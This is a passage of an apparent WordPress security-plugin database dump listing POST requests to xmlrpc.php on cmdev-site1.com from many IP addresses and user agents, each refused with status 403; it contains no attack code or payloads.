Chrome\\/79.0.3945.130 Safari\\/537.36\"}','VoaD17b5R6w9S3uGqHXkMU0W',0,1681466999.5083,1352,'','POST',403,0,515,0,1,'',0),('157.7.190.240',2634530544,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','yf9Q2RHXGqJdCEUawOjbs7pI',0,1681467003.2825,761,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','A8qZRTMyXfuk0jSgQamNJiYb',0,1681467009.3977,584,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','lmjb1TanFL4ZcskpPM7uXIew',0,1681467017.8568,568,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','tgWDGAde0C5FV1XHSTiEknh3',0,1681467021.0478,643,'','POST',403,0,515,0,1,'',0),('74.208.59.245',1255160821,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','aAWrLnT3lO0mgkbe4dfYUI85',0,1681467027.7704,561,'','POST',403,0,515,0,1,'',0),('77.220.104.89',1306290265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','fqNAkxQ0eJZDn5YVbu3F4yIT',0,1681467036.7887,1428,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','Tw1mzh3JyrXRHAF9KV2k4cCo',0,1681467046.1958,573,'','POST',403,0,515,0,1,'',0),('217.138.195.19',3649749779,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MT3C2vInBaAiwqUPlfVsGeX1',0,1681470140.9629,762,'','POST',403,0,515,0,1,'',0),('146.70.61.139',2454076811,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kEj1zNcI7Mb9ReXJQWtyUhf4',0,1681470245.4722,592,'','POST',403,0,515,0,1,'',0),('178.32.187.122',2988489594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','UTngMbExcZyHfYe2L9kdB3tq',0,1681470737.8641,4492,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','JY4AwhnU3PHjFe0xkE1oDrOR',0,1681470742.0531,2301,'','POST',403,0,515,0,1,'',0),('77.68.6.56',1296303672,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','D8CqbvFSjPy7ZMeQBE4UxXOl',0,1681470742.3593,2809,'','POST',403,0,515,0,1,'',0),('178.32.187.122',2988489594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','yfG9LjCPbguRKwc1dx5JThBZ',0,1681470749.0785,586,'','POST',403,0,515,0,1,'',0),('192.64.117.65',3225449793,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','4v39z7K0u6yn8QGNwtdcHBs2',0,1681470750.3317,580,'','POST',403,0,515,0,1,'',0),('160.153.153.159',2694420895,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','Rt1JxpAjZimcP9g6CGLblkVN',0,1681470753.2748,568,'','POST',403,0,515,0,1,'',0),('104.207.254.152',1758461592,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','ETupVLzbcNy0Ux5l7qiojMaf',0,1681470755.7988,552,'','POST',403,0,515,0,1,'',0),('65.108.230.119',1097655927,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','AKHPB8gOL6W94hxqJZmcupGz',0,1681470765.0212,562,'','POST',403,0,515,0,1,'',0),('82.16.21.137',1376785801,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','mD2EF7kResaw1cg6L3y5znNM',0,1681470770.0553,563,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','AEOm7l5hzwjGNJcb1eivs2QC',0,1681470778.2099,643,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','vysWDUHuTZ56aCpBtxOwRm7o',0,1681470779.6727,560,'','POST',403,0,515,0,1,'',0),('47.242.62.161',804404897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','Mr207ynJ9bSPICfmdENGOUsW',0,1681471289.1098,1324,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','iYWqROZ7rSc9QLzylV1Nd3Cb',0,1681471290.6358,563,'','POST',403,0,515,0,1,'',0),('59.106.222.53',996859445,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','q9Cz5LmSlOkrAb4Yus0nMDFW',0,1681471291.4070,614,'','POST',403,0,515,0,1,'',0),('3.133.63.139',59064203,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','1tAmiS23Zr6pBjI7Vs0yJXQf',0,1681471310.3813,584,'','POST',403,0,515,0,1,'',0),('101.32.41.71',1696606535,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','86SCHG5YeJwN9yrMi2vRoPFO',0,1681471315.0418,561,'','POST',403,0,515,0,1,'',0),('51.79.204.217',860867801,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rIgtp3B6G0EPKRcZTOUS1yJi',0,1681471316.8389,569,'','POST',403,0,515,0,1,'',0),('92.205.53.115',1556952435,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','hTtoxBsieOyXpR6ukcKa2jH5',0,1681471332.4773,639,'','POST',403,0,515,0,1,'',0),('178.21.17.239',2987725295,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','owcrteL5WMpSHaROPiGYbzKI',0,1681471334.1813,554,'','POST',403,0,515,0,1,'',0),('170.249.206.66',2868497986,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','Na6q3IgEGp2kMAFnVPwc9i7t',0,1681473467.3214,2292,'','POST',403,0,515,0,1,'',0),('74.208.233.41',1255205161,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','ieMwYcBphH6VuWxoO0SAEdXU',0,1681473471.3048,592,'','POST',403,0,515,0,1,'',0),('157.230.250.100',2649160292,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','7MOCiTBkVbnUQ3eroZGq1Rhc',0,1681473472.9541,563,'','POST',403,0,515,0,1,'',0),('74.208.233.41',1255205161,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','Y3T0lmqycSV182jhHMvpBnGb',0,1681473479.2230,660,'','POST',403,0,515,0,1,'',0),('195.154.107.17',3281677073,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','HSati9kCPI30wMbOEqTBQmYv',0,1681473479.9960,592,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','VF40Bj6D5uqHO8X3RCJolibn',0,1681473485.1658,684,'','POST',403,0,515,0,1,'',0),('134.122.120.71',2256173127,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','dv485BuemRUqGps97DWPt2XY',0,1681473493.2988,576,'','POST',403,0,515,0,1,'',0),('31.170.22.49',531240497,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','nbj9u1xJDhe0RHLpCiZg4rQs',0,1681473497.0629,943,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','FModSzAWanj7E6ti5uYXsTex',0,1681473502.2400,563,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','YQF3dLwkHZ4jGxfnCDpV1Wtl',0,1681473505.8971,635,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','o87quY65IDHszynxOdgEV1XZ',0,1681473511.4747,636,'','POST',403,0,515,0,1,'',0),('5.135.143.169',92770217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','WTBgkexIS85ucYwitaMhv427',0,1681473512.2797,570,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','fteRE1Pm92OL3l74GDsNAuUw',0,1681475426.9690,7277,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ube6MaSjnz79dGNO1P5ZFgyr',0,1681475435.3438,4439,'','POST',403,0,515,0,1,'',0),('216.194.166.253',3636635389,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','qMcKfpubRN1gvmPYsjCBDXOV',0,1681475441.9378,701,'','POST',403,0,515,0,1,'',0),('47.56.207.178',792252338,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','qjfWOGKrHYxTDiws27tCMkBX',0,1681475447.3534,696,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','P3ID8plA2m4KEXWhBkv5w1O9',0,1681475448.0602,605,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','rhYqcingzGQtvkW1oxKsPyR5',0,1681475455.7521,2572,'','POST',403,0,515,0,1,'',0),('82.102.27.195',1382423491,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','urq5befhgHmGwF1C4AILlajP',0,1681476500.0798,3886,'','POST',403,0,515,0,1,'',0),('213.152.161.240',3583549936,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','SwcJNg4luFq8Wy15CRixd3oj',0,1681477316.4171,3961,'','POST',403,0,515,0,1,'',0),('185.200.116.211',3116922067,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZejOHXyLmJo2FCzEcWkAv8qr',0,1681477772.6541,5603,'','POST',403,0,515,0,1,'',0),('159.69.160.206',2672140494,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','mVtOyx5qacgwhAL74pTIGz1d',0,1681478827.6848,3576,'','POST',403,0,515,0,1,'',0),('159.69.160.206',2672140494,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','F2JsCGQh6tyc4LWuIDX0ipVw',0,1681478827.0238,5125,'','POST',403,0,515,0,1,'',0),('213.165.236.232',3584421096,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','nJZlQVw9HP7Cvq6aA3FrSdEG',0,1681478846.4838,556,'','POST',403,0,515,0,1,'',0),('178.32.187.122',2988489594,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','o2fxq9X7wE0UByQbeOLk4Wz5',0,1681478848.1686,567,'','POST',403,0,515,0,1,'',0),('188.225.21.131',3168867715,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','u5QkZmWIhgABLSyxTXnOd7oi',0,1681478853.8599,549,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','P2pYw410XC6OsGnUzBZboixl',0,1681478855.4685,580,'','POST',403,0,515,0,1,'',0),('104.207.254.152',1758461592,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','Sy2OrwQMXiLGUIR3gNb8cula',0,1681478863.2875,544,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','byCv68USkdnYjRMX4JmFxiBQ',0,1681478871.2183,598,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','GkYPvidVZDNO2qbHlA9nCTK1',0,1681478872.8684,547,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','I6YSqDxVQdkyg3EaCTJ9RjLf',0,1681478874.9594,595,'','POST',403,0,515,0,1,'',0),('178.21.17.239',2987725295,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','B2O9HmsMaf3IYjQ5cXGJu68b',0,1681479027.3971,2862,'','POST',403,0,515,0,1,'',0),('54.37.121.239',908425711,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','LvXVbfIKRnyG1NwaFp84jehA',0,1681479027.6401,3319,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','rKx8EfFdVSRGTq29gMasWZQ7',0,1681479031.4900,569,'','POST',403,0,515,0,1,'',0),('59.106.222.53',996859445,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','OvrsgEXmw2jhHiuUdK5nPQ8I',0,1681479036.0392,570,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','dVjlvWSmHrnO9NTqEQ3PI5yM',0,1681479048.4780,604,'','POST',403,0,515,0,1,'',0),('178.32.201.69',2988493125,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','0FiGa57J4dqre6LTXsIhlSyY',0,1681479049.2887,602,'','POST',403,0,515,0,1,'',0),('65.109.160.235',1097703659,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','hqPjDHOpX49AGcZNYIoQVg5a',0,1681479052.6994,577,'','POST',403,0,515,0,1,'',0),('85.10.148.169',1426756777,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','G7qOiYzd4mAhTMKWawby2lNU',0,1681479056.8403,619,'','POST',403,0,515,0,1,'',0),('213.152.162.5',3583549957,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','m8xaEkviDjHI3ernL5o1wt0B',0,1681479965.4740,1727,'','POST',403,0,515,0,1,'',0),('213.152.162.5',3583549957,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','w6NScHJqOxnmtjzoATUE8s1f',0,1681480018.7175,654,'','POST',403,0,515,0,1,'',0),('178.162.209.171',2997014955,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bvHOSdWPmKw2D9NILVR4qtiM',0,1681480605.4579,1707,'','POST',403,0,515,0,1,'',0),('82.165.80.95',1386565727,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','BzwSD4xIulo62RJTEyKgGNaf',0,1681483218.4544,1416,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','CuBZ9OrNanAgcq8YRie2J4Ip',0,1681483218.3525,2215,'','POST',403,0,515,0,1,'',0),('34.80.163.64',575710016,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','VHgPaLmMnRXDZ9YSbeloEvQ2',0,1681483223.2859,1039,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','hVKnRJ6f24Llsb1WpyFcZjNd',0,1681483225.9658,647,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','1YOsxaVjTymWDwkqRogli63e',0,1681483237.0194,573,'','POST',403,0,515,0,1,'',0),('149.129.227.62',2508317502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','CGkBq0w7NLPAxy2MgFov8Ytj',0,1681483243.0813,594,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','9MdFtoajOHre3q4UmK0gW2Lc',0,1681483244.4409,574,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','HKFXaL812lnbTyEes0fmwWCI',0,1681483256.0216,590,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','pD812SBwZ5M6zAnbKRqrs7Xk',0,1681483257.5821,1199,'','POST',403,0,515,0,1,'',0),('159.69.160.206',2672140494,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','BSFYsgWqTwQIEMCtPAHGyi73',0,1681483258.4790,857,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','2EyJ10nsX9QuU7ZzShPCvIRx',0,1681483852.2031,1724,'','POST',403,0,515,0,1,'',0),('180.188.198.223',3032270559,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','hD0zL9IijyoMtgOPbBQsWdmk',0,1681483857.6844,582,'','POST',403,0,515,0,1,'',0),('157.7.190.240',2634530544,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) 